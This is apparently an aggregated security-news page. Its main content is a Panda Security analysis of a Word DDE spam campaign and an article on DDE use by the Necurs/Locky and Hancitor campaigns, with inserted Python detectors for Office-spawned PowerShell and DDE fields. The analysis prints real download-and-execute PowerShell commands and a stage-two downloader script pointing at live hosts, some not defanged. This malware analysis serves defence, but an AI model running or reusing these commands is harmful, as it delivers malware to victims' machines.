All posts by Avira

Turning up the heat on smart thermostats

Smart thermostats are near the top of many shopping lists of ‘must have’ devices for the connected home. After all, who wouldn’t want the financial and energy-efficiency advantages of a programmable device without all the installation headaches? But have you considered the security and privacy issues they might involve? Smart goes mainstream Smart […]

The post Turning up the heat on smart thermostats appeared first on Avira Blog.


A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office that was already being actively exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies that makes use of this exploit. This is a very dangerous attack, since commands can be executed from Word with no OLE objects or macros needed. All our clients are proactively protected by Adaptive Defense 360, and no update is necessary.

Behavior

The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('hxxp://arkberg-design.fi/KJHDhbje71');powershell -e $e "


Here is a screenshot of the process tree that is generated when the exploit executes successfully:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

The download URL varies from sample to sample, while the command itself is essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://arkberg-design.fi/KJHDhbje71')~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71')~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://vithos.de/hjergf76')~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://alexandradickman.com/KJHDhbje71')~powershell -e $e
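The process tree in the screenshot above (WINWORD.EXE launching cmd.exe, which launches a hidden PowerShell that downloads a second stage) is exactly the chain a SOC can alert on from process-creation telemetry. The following is an added example, not code from Panda Security or from the campaign: a small Python detector that runs over Sysmon-style process-creation events (field names ProcessGuid, ParentProcessGuid, Image, ParentImage and CommandLine are assumed), walks parent links to find an Office ancestor, and looks for the download and hidden-window flags seen in the stage-one commands listed above. The events, GUIDs and the example.invalid URL are constructed for the demonstration.

```python
# Detect Office -> shell -> PowerShell download chains in process-creation events.
# Added example; event format is a Sysmon-like subset, all sample data is constructed.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download cradles seen in the stage-one command on this page (extend as needed).
DOWNLOAD_TOKENS = ("downloadstring", "downloadfile")
# Flags used to hide the window and suppress profiles/interaction; on their own these
# are also used by legitimate scripts, so two are required before they count.
EVASION_TOKENS = ("-w hidden", "-windowstyle hidden", "-nop", "-noni", " -e ", "-enc")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(event, by_guid):
    """Follow ParentProcessGuid links; return the first Office ancestor image, or None."""
    seen = set()
    cur = by_guid.get(event.get("ParentProcessGuid"))
    while cur is not None and cur["ProcessGuid"] not in seen:
        seen.add(cur["ProcessGuid"])  # guards against malformed, cyclic telemetry
        if basename(cur["Image"]) in OFFICE_APPS:
            return basename(cur["Image"])
        cur = by_guid.get(cur.get("ParentProcessGuid"))
    return None


def evaluate(event, by_guid):
    """Return a list of human-readable reasons this event is suspicious (empty if none)."""
    reasons = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "").lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    ancestor = office_ancestor(event, by_guid)
    if ancestor and parent not in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"{image} descends from {ancestor} via {parent}")
    downloads = [t for t in DOWNLOAD_TOKENS if t in cmdline]
    evasion = [t for t in EVASION_TOKENS if t in cmdline]
    if "powershell" in cmdline and (downloads or len(evasion) >= 2):
        flags = ", ".join(t.strip() for t in downloads + evasion)
        reasons.append("powershell download/evasion flags: " + flags)
    return reasons


def detect(events):
    """Run evaluate() over a batch of events and return the alerts in input order."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        reasons = evaluate(e, by_guid)
        if reasons:
            alerts.append({"ProcessGuid": e["ProcessGuid"], "Image": basename(e["Image"]), "reasons": reasons})
    return alerts


# Constructed sample telemetry mirroring the chain in the screenshot; {g0}..{g4} are fake GUIDs.
SAMPLE_EVENTS = [
    {"ProcessGuid": "{g1}", "ParentProcessGuid": "{g0}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\analyst\Downloads\I_215854.doc"'},
    {"ProcessGuid": "{g2}", "ParentProcessGuid": "{g1}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://stage1.example.invalid/x');powershell -e $e"},
    {"ProcessGuid": "{g3}", "ParentProcessGuid": "{g2}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://stage1.example.invalid/x');powershell -e $e"},
    # Benign admin script: -NoProfile alone must not raise an alert.
    {"ProcessGuid": "{g4}", "ParentProcessGuid": "{g0}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["ProcessGuid"], alert["Image"], "->", "; ".join(alert["reasons"]))
```

The ancestor walk matters because the PowerShell process in this chain is a grandchild of Word: a rule keyed only on the direct parent would see cmd.exe and miss the Office origin.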

The following PowerShell script is downloaded and executed:

# Stage-two downloader: tries each URL in turn and stops after the first successful download and launch.
$urls = "hxxp://shamanic-extracts.biz/eurgf837or","hxxp://centralbaptistchurchnj.org/eurgf837or","","hxxp://conxibit.com/eurgf837or"
foreach($url in $urls){
    Try
    {
        Write-Host $url
        # Payload is written under the user's temp directory and started from there.
        $fp = "$env:temprekakva32.exe"
        Write-Host $fp
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
        break
    }
    Catch
    {
        # A failed URL is reported and the next one in the list is tried.
        Write-Host $_.Exception.Message
    }
}

In our analysis the payload was retrieved from this URL:

hxxp://shamanic-extracts.biz/eurgf837or

The downloaded file is a Trojan (4F03E360BE488A3811D40C113292BC01).

MD5s of the Word documents:

0910541C2AC975A49A28D7A939E48CD3
19CD38411C58F5441969E039204C3007
96284109C58728ED0B7E4A1229825448
1CB9A32AF5B30AA26D6198C8B5C46168

The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.


Unpatched Microsoft Word DDE Exploit Being Used In Widespread Malware Attacks


A newly discovered, unpatched attack method that exploits a built-in feature of Microsoft Office is currently being used in several widespread malware campaigns.

Last week we reported how attackers could leverage an old Microsoft Office feature called Dynamic Data Exchange (DDE) to achieve malicious code execution on a targeted device without requiring macros to be enabled or relying on memory corruption.

The DDE protocol is one of several methods Microsoft provides to let two running applications share data.

The protocol is used by thousands of applications, including MS Excel, MS Word, Quattro Pro and Visual Basic, both for one-time data transfers and for continuous exchanges in which applications send each other updates.

The DDE technique shows the victim no “security” warning, only a prompt asking whether to run the application named in the command, and even that prompt can be suppressed “with proper syntax modification.”
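Because the field code is ordinary document content (the Panda write-up above shows it under “Edit field”: a DDE instruction naming cmd.exe and a PowerShell command line), a mail gateway or analysis pipeline can look for it before Word ever renders the document. The following is an added example, not code from The Hacker News, Panda or any of the campaigns: a Python scanner that opens an OOXML (.docx) container, collects every field instruction from the XML parts under word/ (complex fields split across w:instrText runs as well as w:fldSimple attributes), and flags the ones that start with DDE or DDEAUTO. It assumes the OOXML container format; the legacy binary .doc files named in this campaign need an OLE parser instead (for example the msodde tool in oletools). The test documents are constructed in memory and carry only word/document.xml, which is enough for the scanner but not a full Word file.

```python
# Scan OOXML .docx containers for DDE/DDEAUTO field instructions.
# Added example; sample documents below are constructed, not real campaign files.
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Field instructions starting with DDE or DDEAUTO ask Word to talk to (and if needed
# launch) an external program; DDEAUTO fires when the document is opened.
DDE_RE = re.compile(r"^\s*(DDE|DDEAUTO)\b", re.IGNORECASE)
QUOTE_ENTITY = {'"': "&quot;"}


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def extract_field_instructions(docx_bytes):
    """Return every field instruction found in the XML parts under word/
    (body, headers, footers, footnotes) of an OOXML .docx given as bytes."""
    instructions = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            # A complex field is: fldChar begin -> instrText run(s) -> separate -> result -> end.
            # The instruction may be split over several w:instrText elements, so join them.
            current = []
            for el in root.iter():
                tag = _local(el.tag)
                if tag == "fldChar":
                    kind = el.get(f"{{{W_NS}}}fldCharType")
                    if kind == "begin":
                        current = []
                    elif kind in ("separate", "end") and current:
                        instructions.append("".join(current))
                        current = []
                elif tag == "instrText":
                    current.append(el.text or "")
                elif tag == "fldSimple":
                    # Simple fields carry the whole instruction in the w:instr attribute.
                    instructions.append(el.get(f"{{{W_NS}}}instr") or "")
    return instructions


def find_dde_fields(docx_bytes):
    """Return the DDE/DDEAUTO field instructions in the document (empty list if none)."""
    return [i.strip() for i in extract_field_instructions(docx_bytes) if DDE_RE.match(i)]


def build_sample_docx(instruction, simple=False):
    """Construct a minimal in-memory .docx holding one field (test input, not a real file)."""
    if simple:
        field = (f'<w:fldSimple w:instr="{escape(instruction, QUOTE_ENTITY)}">'
                 '<w:r><w:t>field result</w:t></w:r></w:fldSimple>')
    else:
        field = ('<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
                 f'<w:r><w:instrText xml:space="preserve">{escape(instruction)}</w:instrText></w:r>'
                 '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
                 '<w:r><w:t>field result</w:t></w:r>'
                 '<w:r><w:fldChar w:fldCharType="end"/></w:r>')
    document_xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                    f'<w:document xmlns:w="{W_NS}"><w:body><w:p>{field}</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed instruction in the shape of the field shown on this page, with a harmless command.
    hostile = build_sample_docx('DDEAUTO c:\\windows\\system32\\cmd.exe "/k echo constructed"')
    benign = build_sample_docx('DATE \\@ "M/d/yyyy"')
    print("hostile:", find_dde_fields(hostile))
    print("benign:", find_dde_fields(benign))
```

The match is anchored at the start of the instruction, so ordinary fields whose arguments happen to contain the letters DDE are not flagged; conversely, instructions built up from nested fields (for example a QUOTE field assembling the text) would need the scanner to resolve the inner fields first, which this example does not attempt.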

Soon after the details of the DDE attack technique went public, Cisco’s Talos threat research group published a report on a campaign actively using it in the wild to target several organisations with a fileless remote access trojan (RAT) called DNSMessenger.

Necurs Botnet Using DDE Attack to Spread Locky Ransomware


Now the Necurs botnet, malware that currently controls over 6 million infected computers worldwide and sends millions of emails, has been found distributing Locky ransomware and the TrickBot banking trojan via Word documents that use the newly discovered DDE attack technique, SANS ISC reported.

The Locky operators previously relied on macro-based, booby-trapped MS Office documents, but they have now updated the Necurs botnet to deliver the malware via the DDE exploit, and the downloader has gained the ability to take screenshots of victims’ desktops.

“What’s interesting about this new wave is that the downloader now contains new functionality to gather telemetry from victims,” Symantec said in a blog post.

“It can take screen grabs and send them back to a remote server. There’s also an error-reporting capability that will send back details of any errors that the downloader encounters when it tries to carry out its activities.”

Hancitor Malware Using DDE Attack


A separate malware spam campaign discovered by security researchers has also been found distributing the Hancitor malware (also known as Chanitor and Tordal) using the Microsoft Office DDE exploit.

Hancitor is a downloader that installs malicious payloads such as banking trojans, data-theft malware and ransomware on infected machines; it is usually delivered as a macro-enabled MS Office document in phishing emails.

How to Protect Yourself From Word DDE Attacks?


Since DDE is a legitimate Microsoft feature, most antivirus solutions neither warn about nor block MS Office documents containing DDE fields, and the company has no plans to issue a patch that would remove the functionality.

You can, however, protect yourself and your organisation from such attacks by disabling the “Update automatic links at open” option in the MS Office programs.

To do so, open Word → File → Options → Advanced, scroll down to General and uncheck “Update automatic links at open.”

The best protection against such attacks, though, is always to be suspicious of any unsolicited document sent by email and never to click links inside those documents unless you have adequately verified the source.

Fall Creators, the new Windows 10 upgrade

Fluent Design is finally arriving to Windows 10

Earlier this year, Microsoft unveiled its Fluent Design System, a new design language for the Windows 10 interface, announcing at the same time a number of changes to the company’s software in the future. This week, the Redmond company has finally rolled out the first phase of the new system, as part of the Windows 10 Fall Creators Update.

The launch has been accompanied by a video showcasing some of the new design changes to Windows 10, although it doesn’t reveal much information about any of the future additions. The video offers a sneak peek of various components and apps that have been redesigned with new visual effects that aim to give Windows 10 more texture, depth and visual responsiveness to inputs. The new Fluent Design will roll out gradually, starting with its own apps and elements like the Start menu, Action Center and notifications. Microsoft has stated that these are just the first steps of the project and that new features and capabilities will be introduced in the future.

Fluent Design System is intended to be the successor to Microsoft’s Metro design and will appear across apps and services on Windows, iOS and Android. Microsoft is focusing on light, depth, motion and scale, with animations that add a sense of fluidity during interactions, in contrast to the minimalistic, tile-based interface of the past. Besides incorporating the first phase of Fluent Design System, the Windows 10 Fall Creators Update also introduces OneDrive Files On-Demand, a new feature that allows users to access their documents without having to download them. Microsoft Edge has also been improved, incorporating a new tool to manage Favorites and the ability to import settings from Chrome. Finally, the operating system includes a new GPU monitoring option in the Task Manager.

More new features yet to come

We’re expecting to see even more changes in the next Windows 10 update, which is currently in development under the codename Redstone 4. Microsoft has started testing the initial features for this version, which is scheduled for March 2018. The main addition so far is a new Cortana Collections feature, which will see and remember users’ browsing habits. As Microsoft finishes its functionality tests, new information will be unveiled about the new improvements, in addition to a new Timeline feature that will let users resume sessions and apps on Windows PCs, iOS and Android devices more easily.

This update does not affect the operation of the Windows 10-compatible antivirus solutions available on the market, including the entire Panda Antivirus product line. So, installing a professional antivirus tool is not only possible, but highly recommended. In this context, the latest version of Panda’s antivirus solutions has the added guarantee of having achieved one of the best detection rates in the latest edition of the AV-Comparatives professional antivirus comparative review.

The post Fall Creators, the new Windows 10 upgrade appeared first on Panda Security Mediacenter.
